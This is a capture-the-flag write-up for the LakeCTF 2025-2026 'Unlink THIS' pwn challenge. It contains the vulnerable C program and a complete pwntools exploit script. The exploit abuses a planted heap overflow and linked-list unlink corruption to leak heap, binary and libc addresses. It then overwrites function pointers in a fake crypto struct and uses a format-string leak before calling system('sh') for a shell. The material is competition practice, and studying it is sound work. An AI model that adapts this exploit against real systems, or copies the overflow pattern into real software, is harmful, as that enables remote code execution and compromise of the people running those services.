LakeCTF 2025-2026 Quals - Unlink THIS (pwn)

exp.py

#!/usr/bin/env python3
from pwn import *

exe = context.binary = ELF("./unlink-this/unlink", checksec=False)
libc = exe.libc


def add(io, size, data):
    io.recvuntil(b"thing\n")
    io.sendline(b"1")
    io.recvuntil(b"size?\n")
    io.sendline(str(size).encode())
    io.recvuntil(b"data?\n")
    io.send(data)
    return int(io.recvline().split()[-1])


def sign(io, sid, extra=False, skip=False):
    io.recvuntil(b"thing\n")
    io.sendline(b"2")
    io.recvuntil(b"id?\n")
    io.sendline(str(sid).encode())
    if skip:
        return
    if extra:
        extra = io.recvline()
    io.recvuntil(b"=============================\n")
    data = io.recvuntil(b"\n=============================", drop=True)
    io.recvuntil(b"=============================\n")
    io.recvuntil(b"\n=============================", drop=True)
    if extra:
        return extra
    return data


def main():
    if args.REMOTE:
        io = remote("chall.polygl0ts.ch", 6666)
    else:
        io = process(exe.path)
        pause()

    line = 8
    size = 0x400
    size1 = 0x120
    size2 = 0x140

    c0 = add(io, size, b"0" * line)
    c1 = add(io, size, b"1" * line)
    c2 = add(io, size, b"2" * line)
    c3 = add(io, size, b"3" * line)
    c4 = add(io, size, b"4" * line)
    c5 = add(io, size, b"5" * line)
    c6 = add(io, size, p64(0x148))

    sign(io, c4)
    sign(io, c3)

    #  pause()

    # head = c0 -> c1 -> c2 -> c5 -> 6= tail | c3 -> c4

    payload = b"3" * (size1 + size2) + b"\x88"
    c3 = add(io, size, payload)
    #  info(f"{c1 = :#x}")

    # head = c0 -> c1 -> c2 -> c5 -> c5* -> c3 = tail | c4

    sign(io, c5)

    # head = c0 -> c1 -> c2 -> c6* -> c5x = tail | c5 -> c4

    c5 = add(io, size, b"5" * line)
    c4 = add(io, size, b"4" * line)

    c7 = add(io, size, b"7" * line)
    sign(io, c4)

    # head = c0 -> c1 -> c2 -> c6* -> c5 -> c7 = tail | c4

    leak = sign(io, 2)
    #  print(hex(len(leak)))
    #  print(hexdump(leak))
    heap_addr = u64(leak[0x120:0x128]) - 0x640
    info(f"{heap_addr = :#x}")
    crypto_addr = heap_addr - 0x1000
    info(f"{crypto_addr = :#x}")
    exe.address = u64(leak[0x118:0x120]) - exe.sym.head_next
    info(f"{exe.address = :#x}")
    #  pause()

    sign(io, c5)

    # head = c0 -> c1 -> c2 -> c7 = tail | c5 -> c6* -> c4

    rop = ROP(exe)
    ret = rop.ret.address

    c5 = add(io, size, b"5" * line)
    c6 = add(io, size, b"6" * line)
    c4 = add(io, size, b"4" * line)

    magic1 = exe.sym.sign + 83
    magic1 = exe.sym.sign + 65
    magic1 = exe.sym.sign + 114
    magic1 = exe.sym.main + 134

    magic2 = exe.sym.create + 166

    fp_sign = exe.plt.printf
    fp_alloc = ret
    fp_destroy = ret

    fake_crypto = heap_addr + 0xA08
    c8 = add(io, size, flat(fp_destroy))
    c9 = add(io, size, b"9" * line)
    sign(io, c8)
    sign(io, c9)

    sign(io, c7)
    c7 = add(io, size, b"7" * (size1 + 0x18) + p64(fp_alloc))

    sign(io, c6)
    c6 = add(io, size, b"6" * (size1) + p64(fake_crypto + 8))
    sign(io, c6)

    sign(io, c7)

    c7 = add(io, size, b"7" * line)
    c6 = add(io, size, b"6" * line)
    c9 = add(io, size, b"9" * line)
    sign(io, c6)

    #  sign(io, c7)
    #  c7 = add(io, size, b"7" * (size1 + 0x10) + p64(fp_sign))

    sign(io, c7)
    c7 = add(io, size, b"7" * line)

    c6 = add(io, size, b"6" * line)

    sign(io, c4)
    sign(io, c6)
    sign(io, c5)

    sign(io, c7)
    #  c7 = add(io, size, b"7" * line)
    c7 = add(io, size, b"7" * (size1 + 0x10) + p64(fp_sign))

    # head = c0 -> c1 -> c2 -> c7 = tail | c5 -> c6* -> c4

    c5 = add(io, size, b"5" * (size2 + size1 + 8) + p64(fake_crypto))
    c6 = add(io, size, b"6" * (size1 - 8) + p64(exe.sym.crypto - 8))

    sign(io, c7)

    c7 = add(io, size, b"7" * (size1 + 8) + b"%13$p".ljust(8, b"\n") + p64(fp_sign))

    leak = sign(io, c7, extra=True)
    libc.address = int(leak.strip(), 16) - 0x2A1CA
    info(f"{libc.address = :#x}")

    c7 = add(
        io, size, b"7" * (size1 + 8) + b"sh;".ljust(8, b"\n") + p64(libc.sym.system)
    )
    sign(io, c7, skip=True)

    #  c7 = add(io, size, b"7" * (size1) + b"%15$p|\n")
    #  sign(io, c7)

    io.interactive()


if __name__ == "__main__":
    main()

unlink.c

#include <stdio.h>
#include <time.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h> 
#include <string.h>
#include <errno.h>
#include <jemalloc/jemalloc.h>

typedef struct crypto_thing{
    size_t sig_counter;
    int (*sign)(void* crypto_thing, char* buf, size_t len, char* out);
    char* (*allocate_sig)(); 
    void (*destroy_sig)(char* sig); 
}crypto_thing;

typedef struct some_thing{
    size_t next;
    size_t prev;
    int session_id;
    size_t challenge_len;
    char challenge[0x100];
}some_thing;

size_t nr_things = 0;
long list_inited = 0;
some_thing* head_next;
some_thing* head_prev;
crypto_thing* crypto;

int gen_session(){
   return random(); 
}

size_t get_number() {
  size_t n = 0;
  scanf("%zu%*c",&n);
  return n;
}

void linkin(some_thing* new){
    if(!list_inited){
        list_inited = 1;
        head_next = &head_next;
        head_prev = &head_next;
    }
    new->next = &head_next;
    new->prev = head_prev;
    head_prev->next = new;
    head_prev = new; 
}

void unlinnk(some_thing* old){
    some_thing* next = old->next;
    some_thing* prev = old->prev;
    prev->next = old->next;
    next->prev = old->prev;
    old->prev = 0xdeadbeef;
    old->next = 0xdeadbeef;
}

some_thing* find_thing(int session_id){
    some_thing* curr = head_next;
    while(curr != &head_next){
        if(curr->session_id == session_id) return curr;
        curr = curr->next;
    }
    return NULL;
}

void create(){
    if(nr_things>10){
        puts("too many things!");
        return;
    }
    puts("input size?");
    char in[0x400];
    memset(in, 0, 0x400);
    size_t size = get_number();         
    if(size > 0x400){
        return;
    }
    puts("data?");
    read(0, in, size);
    some_thing* newthing = (some_thing*)malloc(sizeof(some_thing));
    newthing->session_id = gen_session();
    memcpy(newthing->challenge, in, strlen(in));
    newthing->challenge_len = (strlen(in) > 0x100) ? 0x100 : strlen(in); 
    linkin(newthing);
    nr_things++;
    printf("new session: %d\n", newthing->session_id);
}

void sign(){
    puts("session id?");
    int session_id = (int)get_number();
    some_thing* thing = find_thing(session_id);
    if(thing == NULL){
        return;
    }
    char* sig_buf = crypto->allocate_sig();
    crypto->sign(crypto, thing->challenge, thing->challenge_len, sig_buf); 
    puts("challenge: ");
    puts("=============================");
    write(1, thing->challenge, thing->challenge_len);
    puts("\n=============================");
    puts("signature: ");
    puts("=============================");
    write(1, sig_buf, 0x100); 
    puts("\n=============================");
    unlinnk(thing);
    free(thing);
    nr_things--;
    crypto->destroy_sig(sig_buf);
}

int crypto_sign(crypto_thing* self, char* buf, size_t len, char* out){
    self->sig_counter += 1;
    memset(out, 0, 0x100);
    //TODO
    return 0;
} 

void menu(){
    puts("1: create something");
    puts("2: do sometehing with the thing");
}

int main(){
    srand((unsigned)time(NULL));
    setbuf(stdin,NULL);
    setbuf(stdout,NULL);
    setbuf(stderr,NULL); 
    crypto = (crypto_thing*)malloc(sizeof(crypto_thing));
    crypto->sig_counter = 0;
    crypto->sign = crypto_sign;
    crypto->allocate_sig = malloc;
    crypto->destroy_sig = free;
    while(1){
        menu();
        switch(get_number()){
            case 1: {
                create();
                break;
            } 
            case 2: {
                sign();
                break;
            } 
            default: {
                puts("not an option..");
                break;
            }
        }
    } 
}